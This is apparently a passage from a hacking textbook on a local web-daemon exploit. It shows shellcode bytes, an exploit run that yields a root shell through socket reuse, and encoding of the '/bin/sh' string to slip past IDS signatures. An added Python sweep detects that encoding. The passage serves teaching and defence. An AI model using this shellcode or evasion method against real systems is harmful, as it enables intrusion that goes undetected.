00000020 b0 3f cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 |.?.Iy..Rh//shh|
00000030 2f 62 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |/bin.R.S..|
0000003e
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ./xtool_tinywebd_reuse.sh socket_reuse_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: socket_reuse_restore (62 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 323] [shellcode 62] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
whoami
root
By reusing the existing socket, this exploit is even quieter since it doesn't create any additional connections. Fewer connections mean fewer abnormalities for any countermeasures to detect.
0x680 Payload Smuggling
The aforementioned network IDS or IPS systems can do more than just track connections—they can also inspect the packets themselves. Usually, these systems are looking for patterns that would signify an attack. For example, a simple rule looking for packets that contain the string /bin/sh would catch a lot of packets containing shellcode. Our /bin/sh string is already slightly obfuscated since it's pushed to the stack in four-byte chunks, but a network IDS could also look for packets that contain the strings /bin and //sh. These types of network IDS signatures can be fairly effective at catching script kiddies who are using exploits they downloaded from the Internet. However, they are easily bypassed with custom shellcode that hides any telltale strings.
0x681 String Encoding
To hide the string, we will simply add 5 to each byte in the string. Then,
after the string has been pushed to the stack, the shellcode will subtract 5
from each string byte on the stack. This will build the desired string on the
stack so it can be used in the shellcode, while keeping it hidden during
transit. The output below shows the calculation of the encoded bytes.
reader@hacking:~/booksrc $ echo "/bin/sh" | hexdump -C
00000000 2f 62 69 6e 2f 73 68 0a |/bin/sh.|
00000008
reader@hacking:~/booksrc $ gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit
reader@hacking:~/booksrc $
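The same add-5 arithmetic carried out in Python, as an added example that is not from the book: it reproduces the two dwords the gdb session prints for "/bin" and "/sh\0", and then shows the detector-side view, a plain string signature that misses the encoded bytes beside a sweep over all 256 single-byte offsets that recovers them. The sample packet is constructed here (a NOP sled plus the two encoded push immediates), not a real capture.

```python
import struct

# Substrings a naive network IDS rule would look for (as described in the text).
TELLTALE = (b"/bin/sh", b"/bin", b"//sh")
KEY = 0x05  # per-byte offset the encoder adds and the shellcode later subtracts


def encode_dwords(s: bytes, key: int = KEY) -> list[int]:
    """Split s into 4-byte chunks (the pieces pushed to the stack), add key to
    every byte with wrap-around, and return each chunk as a little-endian
    dword, i.e. the immediate operand a `push` would carry."""
    if len(s) % 4:
        raise ValueError("string must be a multiple of 4 bytes")
    return [
        struct.unpack("<I", bytes((b + key) & 0xFF for b in s[i:i + 4]))[0]
        for i in range(0, len(s), 4)
    ]


def decode(data: bytes, key: int) -> bytes:
    """Undo the encoding on raw bytes (what the shellcode's subtract loop
    does to the string once it sits on the stack)."""
    return bytes((b - key) & 0xFF for b in data)


def naive_match(payload: bytes) -> bool:
    """The plain string signature: fires only if a telltale appears literally."""
    return any(t in payload for t in TELLTALE)


def sweep_match(payload: bytes) -> set[int]:
    """Detector-side counterpart: try every single-byte additive key and
    return those under which a telltale string appears. Key 0 is the naive
    rule; key 5 is the encoding from the text."""
    return {k for k in range(256) if naive_match(decode(payload, k))}


# Constructed sample packet (not a real capture): 8 NOPs followed by the two
# encoded dwords from the gdb session, each prefixed with a push opcode (0x68).
ENCODED = encode_dwords(b"/bin/sh\x00")  # [0x736e6734, 0x056d7834]
SAMPLE_PACKET = b"\x90" * 8 + b"".join(b"\x68" + struct.pack("<I", d) for d in ENCODED)

if __name__ == "__main__":
    print([hex(d) for d in ENCODED])
    print("naive rule fires:", naive_match(SAMPLE_PACKET))
    print("keys that reveal a telltale:", sorted(sweep_match(SAMPLE_PACKET)))
```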